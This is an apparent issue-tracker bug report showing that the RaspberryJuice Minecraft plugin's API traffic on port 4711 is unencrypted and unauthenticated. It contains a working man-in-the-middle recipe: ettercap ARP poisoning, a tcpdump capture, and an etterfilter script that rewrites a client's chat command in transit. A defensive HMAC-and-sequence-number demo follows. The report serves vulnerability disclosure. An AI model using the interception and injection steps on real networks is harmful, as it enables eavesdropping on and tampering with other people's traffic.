- Type: Bug
- Resolution: Invalid
- Priority: Major
- Java version: openjdk 17.0.1
- Server version: 3279-Spigot-3892929-2071671 (MC: 1.17.1) (Implementing API version 1.17.1-R0.1-SNAPSHOT)
- Plugin version: RaspberryJuice 1.12.1
- Yes
When a client wants to connect to RaspberryJuice, all traffic seems to be available on the network in plain text. Furthermore, the data sent by the client can be manipulated and resent to the server while still appearing to come from the client:
This bug seems to affect the current and all previous versions of RaspberryJuice and Spigot.
Reproduce the issue with a server running Spigot/RaspberryJuice listening on 4711 and a client on the same network with python3 and the mcpi lib. Here is a test script:
from mcpi.minecraft import Minecraft

# Connect to the RaspberryJuice server (default port 4711) and send one chat command
mc = Minecraft.create(address="192.168.56.1")
mc.postToChat('Hello Minecraft')
On the attacker box, use ettercap to run ARP poisoning; now the data is visible unencrypted with tcpdump:
tcpdump -A -i eth1 port 4711 and host 192.168.56.110
04:05:09.845686 IP 192.168.56.110.39210 > 192.168.56.103.4711: Flags [P.], seq 1:28, ack 1, win 229, options [nop,nop,TS val 1057102917 ecr 39383616], length 27
E..O.@@[non-printable header bytes shown as dots by tcpdump -A]chat.post(Hello Minecraft)
To manipulate the data, load into ettercap the following filter, compiled with "etterfilter fil.ecf -o fil.ef":
if (ip.proto == TCP && tcp.dst == 4711 && search(DATA.data, "Hello Minecraft")) {
    log(DATA.data, "/tmp/mispelled_ettercap.log");
    # replacement is the same length as the original, so the segment length stays 27
    replace("Hello Minecraft", "Message Hacked!");
    msg("Altered Client Message\n");
}
Resend the message from the client, and the message will now be altered:
04:10:37.084001 IP 192.168.56.110.39212 > 192.168.56.103.4711: Flags [P.], seq 1:28, ack 1, win 229, options [nop,nop,TS val 1057429973 ecr 39710674], length 27
E..O=u@[non-printable header bytes shown as dots by tcpdump -A]chat.post(Message Hacked!)
Suggestions to prevent this:
I haven't tested on the other plugins to confirm, but protecting this with an encrypted/authenticated channel is possible at the Spigot and/or plugin level, by using TLS for authentication and a cipher like RSA, DH or ECDH for key exchange.
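What the suggestion above amounts to at the plugin level, as an added example that is not code from this report or from RaspberryJuice: each command line is prefixed with a sequence number and an HMAC-SHA256 tag under a pre-shared key, and the server rejects any frame whose tag or sequence number does not check out. It assumes a hypothetical key PSK and the framing `seq|tag|command`, and it stands in for the TLS suggestion with a lighter pre-shared-key MAC: that gives authentication and replay protection but not confidentiality, so the chat text itself would still be readable in tcpdump. Over a loopback socket it feeds the server the genuine frame, the same frame after the 15-byte replace the etterfilter above performs (both segments in the dumps are length 27 for exactly that reason), and a resend of the first frame.

```python
import hashlib
import hmac
import socket
import threading

# Constructed values for this example: the key is hypothetical and would be
# provisioned to client and plugin out of band; the command is the one the
# report's test script sends, as it appears on the wire.
PSK = b"example-pre-shared-key-change-me"
COMMAND = b"chat.post(Hello Minecraft)"


def frame_command(key, seq, command):
    """Wrap one RaspberryJuice-style command as b'<seq>|<hex tag>|<command>\\n'.

    The tag is an HMAC-SHA256 over '<seq>|<command>', so changing either the
    sequence number or the command text invalidates it without the key.
    """
    authed = b"%d|%s" % (seq, command)
    tag = hmac.new(key, authed, hashlib.sha256).hexdigest().encode()
    return b"%d|%s|%s\n" % (seq, tag, command)


def verify_frame(key, expected_seq, frame):
    """Return the command if the frame is authentic and fresh, else raise ValueError."""
    try:
        # maxsplit=2 so a command containing '|' survives intact
        seq_b, tag, command = frame.rstrip(b"\n").split(b"|", 2)
        seq = int(seq_b)
    except ValueError:
        raise ValueError("malformed frame") from None
    expected = hmac.new(key, b"%d|%s" % (seq, command), hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("bad MAC: frame was altered or forged")
    if seq != expected_seq:
        raise ValueError("bad sequence number: frame replayed or reordered")
    return command


def tamper(frame):
    """What the etterfilter above does to a matching segment: a same-length replace."""
    return frame.replace(b"Hello Minecraft", b"Message Hacked!")


def authenticated_server(listener, key, n_frames):
    """Accept one client, check n_frames frames, return [(accepted, detail), ...]."""
    results = []
    expected_seq = 1
    conn, _ = listener.accept()
    with conn, conn.makefile("rb") as rf:
        for _ in range(n_frames):
            try:
                command = verify_frame(key, expected_seq, rf.readline())
                expected_seq += 1
                results.append((True, command))
            except ValueError as exc:
                results.append((False, str(exc)))
    return results


def run_demo():
    """Send a genuine frame, a frame altered in flight, and a replay of the first."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    results = []
    server = threading.Thread(
        target=lambda: results.extend(authenticated_server(listener, PSK, 3)))
    server.start()

    genuine = frame_command(PSK, 1, COMMAND)
    altered = tamper(frame_command(PSK, 2, COMMAND))  # attacker edits seq 2 in flight
    replayed = genuine                                 # attacker resends seq 1 later
    with socket.create_connection(listener.getsockname()) as client:
        client.sendall(genuine + altered + replayed)
    server.join()
    listener.close()
    return results


if __name__ == "__main__":
    for accepted, detail in run_demo():
        print("ACCEPT" if accepted else "REJECT", detail)
```

Running it prints one ACCEPT line for the genuine frame and two REJECT lines, the first for the bad MAC on the altered text and the second for the stale sequence number on the resend. The MAC alone leaves "Hello Minecraft" readable on the wire; for confidentiality the socket would still have to be wrapped in TLS (Python's ssl module on the client side, and the equivalent in the plugin), which is the route the report proposes.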